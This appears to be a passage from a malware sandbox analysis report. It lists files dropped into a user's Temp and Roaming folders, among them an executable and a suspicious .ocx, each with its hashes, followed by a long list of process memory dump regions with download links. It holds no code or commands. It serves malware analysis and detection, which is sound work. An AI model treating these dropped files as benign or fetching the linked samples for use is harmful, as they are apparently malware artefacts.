9917f679a0135245a5cc6b1aadcb3a6c

SHA1
7aab67a56fd3e10fd070e29d2998af2162c0a204

SHA256
a0090b3a687e7d0a6d6b6918bcbb798ebecb184cba8d3eb5fe4345ec9aba9243

SHA512
87194d9f3c97b48a297faef76e3a308de6b454d10a5b50adeb22336982ca5bd5ba3a1cacb39cfbaf78a3befbc37967eb89a7c84cfdd53054204647dffd5b35cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QUBE3.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir4004_1286834430\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir4004_1286834430\b6a7a568-4436-4600-8d23-baaf18c83fcc.tmp

Filesize
150KB

MD5
eae462c55eba847a1a8b58e58976b253

SHA1
4d7c9d59d6ae64eb852bd60b48c161125c820673

SHA256
ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad

SHA512
494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1CD0.tmp.exe

Filesize
3.5MB

MD5
155bf3aaedd924e7191686c60f5d42fc

SHA1
80838be076ed2b0b9776edb36c1bba6532433b24

SHA256
e5d444943ef65bbd3466987435a57db92549c8a0ac87582d58d1df90ed456999

SHA512
1a2255bd27cb26b8ab0250f81d5c6c4d03d5c2cbefe60fa8fbe00490cd04e085a010a6c3dc49b0002b942cdbe6f1d9b48fffb1486b0746889d69a63c2b039ac4

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBDA9.tmp

Filesize
1KB

MD5
fd6cf952910f69ddbb08d1ebe6ad96ee

SHA1
844e2d2e949f2f1ed27719e07e0811a548fa3dd5

SHA256
c5d5284d287ea1765cddab0b42d0f99a9f771bd0a4b6b69d95e4f8d0bbbe90a4

SHA512
08ad153046306c7e839bbbf220ac06a856ce1a86179457a3af5be45d5c04fc2cdbeda8be409d26f09ed4603fda5e9939a76ffa3ca2f266d8dba4f3e364235ba3

Download Submit
C:\Users\Admin\AppData\Roaming\netapi32_2.ocx

Filesize
1.4MB

MD5
c87013ae4715ff280d9f8d2fe749cdba

SHA1
5e7e78ca3d2f799cb9befb0a2f13a1d5636a04af

SHA256
fef9803aa84de828968ffcaebab6050c109147d96420a753b9a6b5d1968ed4bf

SHA512
af9292f763dcd829d3d3d5aa1cd38bae54c2ceb92572f231ede1793e303173f3ba7eef17fe167a0fdc7dd25a9869bd18da4d9e3cb5c75573f1edb6ff1f2e5aaf

Download Submit
memory/456-84-0x0000000000400000-0x00000000004C2000-memory.dmp

Filesize
776KB

Download
memory/456-370-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/996-382-0x0000000009660000-0x0000000009708000-memory.dmp

Filesize
672KB

Download
memory/996-240-0x0000000000F90000-0x000000000108A000-memory.dmp

Filesize
1000KB

Download
memory/1184-59-0x0000000000400000-0x00000000004C2000-memory.dmp

Filesize
776KB

Download
memory/1248-421-0x00000000064B0000-0x00000000064FC000-memory.dmp

Filesize
304KB

Download
memory/1248-431-0x000000006FE40000-0x000000006FE8C000-memory.dmp

Filesize
304KB

Download
memory/1248-441-0x0000000007190000-0x0000000007233000-memory.dmp

Filesize
652KB

Download
memory/1484-288-0x0000000002DE0000-0x0000000002E3E000-memory.dmp

Filesize
376KB

Download
memory/1912-200-0x0000000070BF0000-0x0000000070D67000-memory.dmp

Filesize
1.5MB

Download
memory/1912-177-0x0000000070BF0000-0x0000000070D67000-memory.dmp

Filesize
1.5MB

Download
memory/1912-476-0x0000000070BF0000-0x0000000070D67000-memory.dmp

Filesize
1.5MB

Download
memory/1912-178-0x0000000005390000-0x00000000053A8000-memory.dmp

Filesize
96KB

Download
memory/1932-452-0x000000006FE40000-0x000000006FE8C000-memory.dmp

Filesize
304KB

Download
memory/1956-478-0x0000000007650000-0x0000000007658000-memory.dmp

Filesize
32KB

Download
memory/1956-392-0x0000000005BA0000-0x0000000005EF4000-memory.dmp

Filesize
3.3MB

Download
memory/1956-442-0x000000006FE40000-0x000000006FE8C000-memory.dmp

Filesize
304KB

Download
memory/1956-463-0x0000000007530000-0x0000000007541000-memory.dmp

Filesize
68KB

Download
memory/1956-464-0x0000000007560000-0x000000000756E000-memory.dmp

Filesize
56KB

Download
memory/1956-475-0x0000000007620000-0x0000000007634000-memory.dmp

Filesize
80KB

Download
memory/1956-477-0x0000000007660000-0x000000000767A000-memory.dmp

Filesize
104KB

Download
memory/1988-89-0x0000000003040000-0x0000000003076000-memory.dmp

Filesize
216KB

Download
memory/1988-118-0x0000000007830000-0x00000000078D3000-memory.dmp

Filesize
652KB

Download
memory/1988-105-0x00000000066B0000-0x00000000066FC000-memory.dmp

Filesize
304KB

Download
memory/1988-90-0x00000000056E0000-0x0000000005D08000-memory.dmp

Filesize
6.2MB

Download
memory/1988-91-0x0000000005E80000-0x0000000005EA2000-memory.dmp

Filesize
136KB

Download
memory/1988-104-0x0000000006630000-0x000000000664E000-memory.dmp

Filesize
120KB

Download
memory/1988-106-0x00000000075F0000-0x0000000007622000-memory.dmp

Filesize
200KB

Download
memory/1988-107-0x00000000705A0000-0x00000000705EC000-memory.dmp

Filesize
304KB

Download
memory/1988-117-0x0000000006BD0000-0x0000000006BEE000-memory.dmp

Filesize
120KB

Download
memory/1988-92-0x0000000005F20000-0x0000000005F86000-memory.dmp

Filesize
408KB

Download
memory/1988-93-0x0000000005F90000-0x0000000005FF6000-memory.dmp

Filesize
408KB

Download
memory/1988-123-0x0000000007B60000-0x0000000007B71000-memory.dmp

Filesize
68KB

Download
memory/1988-119-0x0000000007FB0000-0x000000000862A000-memory.dmp

Filesize
6.5MB

Download
memory/1988-120-0x0000000007960000-0x000000000797A000-memory.dmp

Filesize
104KB

Download
memory/1988-122-0x0000000007BE0000-0x0000000007C76000-memory.dmp

Filesize
600KB

Download
memory/1988-121-0x00000000079B0000-0x00000000079BA000-memory.dmp

Filesize
40KB

Download
memory/1988-103-0x0000000006000000-0x0000000006354000-memory.dmp

Filesize
3.3MB

Download
memory/2072-238-0x0000000005820000-0x0000000005838000-memory.dmp

Filesize
96KB

Download
memory/2072-216-0x0000000000B00000-0x0000000000BE4000-memory.dmp

Filesize
912KB

Download
memory/2072-364-0x00000000069B0000-0x0000000006A3E000-memory.dmp

Filesize
568KB

Download
memory/2568-153-0x0000000005EE0000-0x0000000006234000-memory.dmp

Filesize
3.3MB

Download
memory/2568-165-0x00000000705A0000-0x00000000705EC000-memory.dmp

Filesize
304KB

Download
memory/3244-201-0x0000000000850000-0x000000000095E000-memory.dmp

Filesize
1.1MB

Download
memory/3244-363-0x0000000004BD0000-0x0000000004C5E000-memory.dmp

Filesize
568KB

Download
memory/3244-239-0x0000000005820000-0x000000000583E000-memory.dmp

Filesize
120KB

Download
memory/3244-211-0x0000000005390000-0x00000000056E4000-memory.dmp

Filesize
3.3MB

Download
memory/3480-4-0x00007FF8EB3E0000-0x00007FF8EBEA1000-memory.dmp

Filesize
10.8MB

Download
memory/3480-1-0x0000000000710000-0x0000000000718000-memory.dmp

Filesize
32KB

Download
memory/3480-2-0x00007FF8EB3E0000-0x00007FF8EBEA1000-memory.dmp

Filesize
10.8MB

Download
memory/3480-0-0x00007FF8EB3E3000-0x00007FF8EB3E5000-memory.dmp

Filesize
8KB

Download
memory/3480-3-0x00007FF8EB3E3000-0x00007FF8EB3E5000-memory.dmp

Filesize
8KB

Download
memory/3488-60-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3488-34-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3692-876-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-324-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-305-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-300-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-590-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-298-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-287-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-285-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-318-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-877-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-878-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-322-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-341-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-323-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-328-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3692-315-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/3780-228-0x0000000000790000-0x0000000000826000-memory.dmp

Filesize
600KB

Download
memory/3780-376-0x00000000063A0000-0x0000000006402000-memory.dmp

Filesize
392KB

Download
memory/3980-264-0x0000000000830000-0x000000000088C000-memory.dmp

Filesize
368KB

Download
memory/4144-87-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/4144-56-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/4272-6406-0x00000230B7270000-0x00000230B7292000-memory.dmp

Filesize
136KB

Download
memory/4280-150-0x0000000007260000-0x0000000007271000-memory.dmp

Filesize
68KB

Download
memory/4280-139-0x0000000070780000-0x00000000707CC000-memory.dmp

Filesize
304KB

Download
memory/4280-149-0x0000000006F30000-0x0000000006FD3000-memory.dmp

Filesize
652KB

Download
memory/4280-138-0x0000000005D50000-0x0000000005D9C000-memory.dmp

Filesize
304KB

Download
memory/4280-136-0x00000000058A0000-0x0000000005BF4000-memory.dmp

Filesize
3.3MB

Download
memory/4340-6429-0x00000000055D0000-0x0000000005924000-memory.dmp

Filesize
3.3MB

Download
memory/4340-6439-0x0000000005C90000-0x0000000005CDC000-memory.dmp

Filesize
304KB

Download
memory/4736-267-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/4736-270-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/4844-281-0x0000000000950000-0x000000000097C000-memory.dmp

Filesize
176KB

Download
memory/5004-3664-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/5028-339-0x0000000000AE0000-0x0000000000DF4000-memory.dmp

Filesize
3.1MB

Download
memory/5028-313-0x0000000000AE0000-0x0000000000DF4000-memory.dmp

Filesize
3.1MB

Download
memory/5036-175-0x0000000074C50000-0x0000000075400000-memory.dmp

Filesize
7.7MB

Download
memory/5036-31-0x000000000C660000-0x000000000C6FC000-memory.dmp

Filesize
624KB

Download
memory/5036-17-0x0000000000350000-0x0000000001350000-memory.dmp

Filesize
16.0MB

Download
memory/5036-26-0x000000000CAD0000-0x000000000D074000-memory.dmp

Filesize
5.6MB

Download
memory/5036-164-0x0000000074C5E000-0x0000000074C5F000-memory.dmp

Filesize
4KB

Download
memory/5036-30-0x000000000C5C0000-0x000000000C652000-memory.dmp

Filesize
584KB

Download
memory/5036-88-0x000000000C9A0000-0x000000000C9C6000-memory.dmp

Filesize
152KB

Download
memory/5036-16-0x0000000074C5E000-0x0000000074C5F000-memory.dmp

Filesize
4KB

Download
memory/5036-33-0x000000000C540000-0x000000000C54A000-memory.dmp

Filesize
40KB

Download
memory/5036-32-0x0000000074C50000-0x0000000075400000-memory.dmp

Filesize
7.7MB

Download
memory/5132-2313-0x00000000057A0000-0x00000000058A4000-memory.dmp

Filesize
1.0MB

Download
memory/5132-2312-0x0000000005630000-0x0000000005732000-memory.dmp

Filesize
1.0MB

Download
memory/5132-3665-0x0000000005A20000-0x0000000005A7E000-memory.dmp

Filesize
376KB

Download
memory/5132-3666-0x0000000005B60000-0x0000000005BBC000-memory.dmp

Filesize
368KB

Download
memory/5132-2311-0x0000000000D00000-0x0000000000E28000-memory.dmp

Filesize
1.2MB

Download
memory/5204-465-0x000000006FE40000-0x000000006FE8C000-memory.dmp

Filesize
304KB

Download
memory/5276-961-0x0000000006380000-0x0000000006542000-memory.dmp

Filesize
1.8MB

Download
memory/5276-408-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/5276-462-0x0000000006060000-0x00000000060B0000-memory.dmp

Filesize
320KB

Download
memory/5412-919-0x0000000005C10000-0x0000000005F82000-memory.dmp

Filesize
3.4MB

Download
memory/5412-938-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-930-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-924-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-922-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-928-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-932-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-934-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-936-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-944-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-3676-0x0000000006110000-0x0000000006164000-memory.dmp

Filesize
336KB

Download
memory/5412-2506-0x00000000074A0000-0x000000000776C000-memory.dmp

Filesize
2.8MB

Download
memory/5412-921-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-2837-0x00000000064A0000-0x0000000006768000-memory.dmp

Filesize
2.8MB

Download
memory/5412-926-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-942-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5412-909-0x0000000000FA0000-0x00000000013DE000-memory.dmp

Filesize
4.2MB

Download
memory/5412-3019-0x0000000006020000-0x000000000606C000-memory.dmp

Filesize
304KB

Download
memory/5412-940-0x0000000005C10000-0x0000000005F7B000-memory.dmp

Filesize
3.4MB

Download
memory/5608-3659-0x0000000000C20000-0x0000000000C30000-memory.dmp

Filesize
64KB

Download
memory/5608-1889-0x0000000000580000-0x00000000005D4000-memory.dmp

Filesize
336KB

Download
memory/5752-920-0x00000000009B0000-0x00000000009BA000-memory.dmp

Filesize
40KB

Download
memory/6564-6383-0x0000000005620000-0x00000000056F8000-memory.dmp

Filesize
864KB

Download
memory/6564-6382-0x0000000005540000-0x000000000561C000-memory.dmp

Filesize
880KB

Download
memory/6564-5037-0x0000000004FE0000-0x0000000005162000-memory.dmp

Filesize
1.5MB

Download
memory/6564-5026-0x00000000002D0000-0x0000000000650000-memory.dmp

Filesize
3.5MB

Download
memory/6664-3675-0x00000000004A0000-0x00000000007E2000-memory.dmp

Filesize
3.3MB

Download
memory/6664-5015-0x0000000005450000-0x00000000054EC000-memory.dmp

Filesize
624KB

Download
memory/6664-5014-0x0000000005380000-0x000000000541E000-memory.dmp

Filesize
632KB

Download
memory/6664-3681-0x0000000005080000-0x00000000051C4000-memory.dmp

Filesize
1.3MB

Download
memory/6912-3686-0x0000000000530000-0x0000000000546000-memory.dmp

Filesize
88KB

Download